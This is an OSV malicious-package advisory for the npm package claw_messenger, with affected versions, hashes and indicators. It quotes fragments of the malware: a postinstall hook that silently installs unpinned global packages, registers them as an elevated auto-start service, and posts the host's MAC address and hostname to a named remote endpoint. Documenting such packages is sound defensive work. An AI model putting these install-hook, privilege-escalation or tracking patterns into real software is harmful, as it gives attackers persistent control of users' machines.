MAL-2026-4526

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/claw_messenger/MAL-2026-4526.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4526
Published
2026-05-21T02:59:33Z
Modified
2026-06-17T20:01:51.536016286Z
Summary
Malicious code in claw_messenger (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b621afa50fe31026a12750b83eeb309366f95b07a9e0c5095d3e862f0007b70f)

The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during npm install. (1) spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com',...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true }) silently performs a global npm install of opencode-ai from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that the author or any future hijacker of that name can mutate. (2) An update-silent-service flow loads dist/service-installer.js which runs execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 }) against a mutable @latest tag, then dist/daemon-manager.js elevates and registers the resulting binary as a privileged auto-start system service: on Windows via Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs, on Linux via systemd with pkexec/sudo, on macOS via osascript... with administrator privileges. The combination — install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration — gives the author (and anyone who later compromises opencode-ai or claw-subagent-service) persistent root/Administrator code execution on every machine that installs claw_messenger. Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load, which is undocumented device-tracking telemetry but is secondary to the install-time RCE surface.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.0.76"
            ],
            "sha256": "0a6dd7846c1104187872b7c77c06c5af6ce6eebf5fbfca13a3197ca405f62110",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T02:59:33Z",
            "import_time": "2026-05-26T05:51:10.172965201Z",
            "id": "IN-MAL-2026-003714"
        },
        {
            "versions": [
                "0.0.76"
            ],
            "sha256": "15ae01d96f3589f6660b2aa5f459595c9346ab885eda35196dae6252775f986a",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T02:59:33Z",
            "import_time": "2026-05-26T05:51:10.042525777Z",
            "id": "IN-MAL-2026-003713"
        },
        {
            "versions": [
                "0.0.81"
            ],
            "sha256": "be1b00c981b646e9dc381b02454553daeb3c1d4c79e6389c4ff8bfabc1895692",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:35Z",
            "import_time": "2026-06-12T19:44:00.18120022Z",
            "id": "IN-MAL-2026-006031"
        },
        {
            "versions": [
                "0.0.78"
            ],
            "sha256": "6bc8d8ebe6a8a6597e5415dcacb635455a226dc6d415c0769b14f10fb6f6e82a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:37Z",
            "import_time": "2026-06-12T19:44:00.57308652Z",
            "id": "IN-MAL-2026-006034"
        },
        {
            "versions": [
                "0.0.79"
            ],
            "sha256": "8718a8d94d27ecb38d0d0117d4c1aa9eb1d62a19ae38b8676b97c46f25a8a991",
            "modified_time": "2026-06-12T19:07:32Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:43:59.72449505Z",
            "id": "IN-MAL-2026-006027"
        },
        {
            "versions": [
                "0.0.77"
            ],
            "sha256": "1598c6493986a4ac5a4b78244955ba89051d40c9d91a0b21499ffa940e918405",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:29Z",
            "import_time": "2026-06-12T19:43:59.418825893Z",
            "id": "IN-MAL-2026-006024"
        },
        {
            "versions": [
                "0.0.95"
            ],
            "sha256": "33d6e3445a3d7078cc5fb63b20119fde5529d19fc0f35b00bff26b3bccd8022b",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:45Z",
            "import_time": "2026-06-12T19:44:01.914775632Z",
            "id": "IN-MAL-2026-006045"
        },
        {
            "versions": [
                "0.0.81"
            ],
            "sha256": "43156e7ab347929d8e3bfdcb149a53fa2d15fa6ff5e1e0fe2fc5f605dffd06af",
            "modified_time": "2026-06-12T19:07:36Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:00.355757524Z",
            "id": "IN-MAL-2026-006032"
        },
        {
            "versions": [
                "0.0.94"
            ],
            "sha256": "5188bb8e9c20ded8a6f408cbd2a007360ca12d05cc8594814d28f7c5c2c0900f",
            "modified_time": "2026-06-12T19:07:44Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:01.776634866Z",
            "id": "IN-MAL-2026-006044"
        },
        {
            "versions": [
                "0.0.80"
            ],
            "sha256": "926845ae4e03999e8733488b89c25e4329f901792c59d3105827a7a9999333d4",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:34Z",
            "import_time": "2026-06-12T19:44:00.056596093Z",
            "id": "IN-MAL-2026-006030"
        },
        {
            "versions": [
                "0.0.80"
            ],
            "sha256": "933f35bc255c240e5caf3a9b438eb50cc7ca2e52893e24098280f93bfd155401",
            "modified_time": "2026-06-12T19:07:34Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:43:59.975332947Z",
            "id": "IN-MAL-2026-006029"
        },
        {
            "versions": [
                "0.0.89"
            ],
            "sha256": "f8c98e6318b3e20e297eb42a3ee219f443fa79e82bbc8c5b6986f97a0d06ba50",
            "modified_time": "2026-06-12T19:07:41Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:01.280000806Z",
            "id": "IN-MAL-2026-006040"
        },
        {
            "versions": [
                "0.0.83"
            ],
            "sha256": "05a3287b1a40ad0e755ebb780f8738d7a2edf831e5ec716620d61fc179e21c3b",
            "modified_time": "2026-06-12T19:07:37Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:00.758693494Z",
            "id": "IN-MAL-2026-006036"
        },
        {
            "versions": [
                "0.0.91"
            ],
            "sha256": "4ebf4249af7ac3cdf473c8a51e652841c1582cdac92998e904ecf35e80ac2e57",
            "modified_time": "2026-06-12T19:07:42Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:01.370265429Z",
            "id": "IN-MAL-2026-006041"
        },
        {
            "versions": [
                "0.0.84"
            ],
            "sha256": "6869fba05896ccbb1db6d0f86781a87f8e4ff0f690f952bfaaf3c412aa5f647e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:39Z",
            "import_time": "2026-06-12T19:44:00.983637026Z",
            "id": "IN-MAL-2026-006038"
        },
        {
            "versions": [
                "0.0.91"
            ],
            "sha256": "72abcbac2b19fdbb8df1122850962b1d98fb484733d226f10890d6d8e5c97477",
            "modified_time": "2026-06-12T19:07:42Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006042",
            "import_time": "2026-06-12T19:44:01.513030629Z"
        },
        {
            "versions": [
                "0.0.84"
            ],
            "sha256": "a947d3124d0b1babb942e0beb2cb12b9eff1f32f76063ab178dfaa0b3be43c08",
            "modified_time": "2026-06-12T19:07:38Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:00.862632546Z",
            "id": "IN-MAL-2026-006037"
        },
        {
            "versions": [
                "0.0.94"
            ],
            "sha256": "ba8937a3dcb9003d86d8d0c45c0cefc2477884ed3d274e2df8c6a2db42401951",
            "modified_time": "2026-06-12T19:07:43Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:01.59881552Z",
            "id": "IN-MAL-2026-006043"
        },
        {
            "versions": [
                "0.0.79"
            ],
            "sha256": "f8fa7b28caf0b8f50b34ec23b3fa3c6e73c8fb0c1154ff37a638f33c63b0e5fb",
            "modified_time": "2026-06-12T19:07:33Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:43:59.86961712Z",
            "id": "IN-MAL-2026-006028"
        },
        {
            "versions": [
                "0.0.78"
            ],
            "sha256": "0885941bc4a25f1e6e9fa5f780621448b6af28241d783929c12e6fa32c6d40de",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:36Z",
            "import_time": "2026-06-12T19:44:00.445585523Z",
            "id": "IN-MAL-2026-006033"
        },
        {
            "versions": [
                "0.0.95"
            ],
            "sha256": "303aeac1ce95f9f8798e164c3de684452c93d668019840a3c47802bc71e4b5d0",
            "modified_time": "2026-06-12T19:07:46Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006046",
            "import_time": "2026-06-12T19:44:02.034771847Z"
        },
        {
            "versions": [
                "0.0.77"
            ],
            "sha256": "4af5535475d2df9ace7290f2fe607f23e2d5b301ad4d3137b936f45015d77a90",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:29Z",
            "import_time": "2026-06-12T19:43:59.334212664Z",
            "id": "IN-MAL-2026-006023"
        },
        {
            "versions": [
                "0.0.83"
            ],
            "sha256": "afaa4f32cd58089cc5bd6bc7c686fe17549e2d535cc895433bb8a23287d8f7bc",
            "modified_time": "2026-06-12T19:07:37Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T19:44:00.666142501Z",
            "id": "IN-MAL-2026-006035"
        },
        {
            "versions": [
                "0.0.89"
            ],
            "sha256": "b621afa50fe31026a12750b83eeb309366f95b07a9e0c5095d3e862f0007b70f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:07:40Z",
            "import_time": "2026-06-12T19:44:01.118578755Z",
            "id": "IN-MAL-2026-006039"
        },
        {
            "versions": [
                "2.1.1"
            ],
            "sha256": "03d0ab20917b6fa482e4392bdec9c2a166d32db8925d5274bdc86b13dc100a0f",
            "modified_time": "2026-06-17T04:31:00Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-17T05:45:42.830967725Z",
            "id": "IN-MAL-2026-006893"
        },
        {
            "versions": [
                "2.1.5"
            ],
            "sha256": "8b9d913fd86e00d379a410685cd7803131147be1112df466c791595c72fb88d6",
            "modified_time": "2026-06-17T04:31:01Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-17T05:45:42.925274246Z",
            "id": "IN-MAL-2026-006894"
        },
        {
            "versions": [
                "2.1.3"
            ],
            "sha256": "a3d75c0e0d430f0e644db8e0d46ccf6945bd3ec260158434bf267e902b64feb9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-17T04:30:58Z",
            "import_time": "2026-06-17T05:45:42.730914761Z",
            "id": "IN-MAL-2026-006891"
        },
        {
            "versions": [
                "2.1.4"
            ],
            "sha256": "cd32138d1e52897385184b52efb7f0bae169f54eaa3792c89b0663486a625df0",
            "modified_time": "2026-06-17T04:30:59Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-17T05:45:42.803863144Z",
            "id": "IN-MAL-2026-006892"
        },
        {
            "versions": [
                "1.0.0-beta.1"
            ],
            "sha256": "ea89d1756fa09c0cead38f90fcf1e731d625a40f4634994b2a612a88e4f85d59",
            "modified_time": "2026-06-17T19:40:27Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006933",
            "import_time": "2026-06-17T19:45:56.867492075Z"
        }
    ]
}
References
Credits

Affected packages

npm / claw_messenger

Package

Affected ranges

Affected versions

0.*
0.0.76
0.0.77
0.0.78
0.0.79
0.0.80
0.0.81
0.0.83
0.0.84
0.0.89
0.0.91
0.0.94
0.0.95
1.*
1.0.0-beta.1
2.*
2.1.1
2.1.3
2.1.4
2.1.5

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "claw_messenger-0.0.76.tgz",
            "hashes": {
                "sha512_sri": "sha512-VuonHWO7H7dP5B6tnR3abrX9xWu18X4RHEaBeuwF5qx6JIlUGIvI+d8YvfPedwQdkp8waNVIqlwWFId2Kn30/Q==",
                "sha1": "85aa6202b52df13fa26629a38effa104aaf4b3d9"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "f674ec5133eeb19081eca906a37311e205b712ed7db7c804149b7a6e3530a560",
            "path": "dist/postinstall.js",
            "tlsh": "3541312a45ea01771f4389991d0b943f272216029158f124facecf5f1793e3d89932fe"
        },
        {
            "sha256": "222ba0a73bd6d60fd1619d7ad5047d0e7035f8703ed60786c4d4ff8dda13cf64",
            "path": "dist/github-downloader.js",
            "tlsh": "4551214609f346361673ae516e9f3016322e6ac3560eed647bcdc20a4f94e2d47d23bd"
        },
        {
            "sha256": "d2aa94fe5bf21c057955f68a545435ee129bfe4a7fb2704e3ab45a8bb7d3b55b",
            "path": "dist/daemon-manager.js",
            "tlsh": "4952645946f791714563647aa71f2116732af203950cfe887ecd874a9f84c2c0af1bed"
        },
        {
            "sha256": "0d0acd44d14b8579e0cad4a335cd48e027bbdb8a0edca48a3548b1dd2532dbc8",
            "path": "dist/auto-register.js",
            "tlsh": "891274d6adfb142e02526859cb5f50247214be872748c458fbccc6d4bfa4914e9a3bf8"
        }
    ],
    "domains": [
        "registry.npmmirror.com"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/claw_messenger/MAL-2026-4526.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]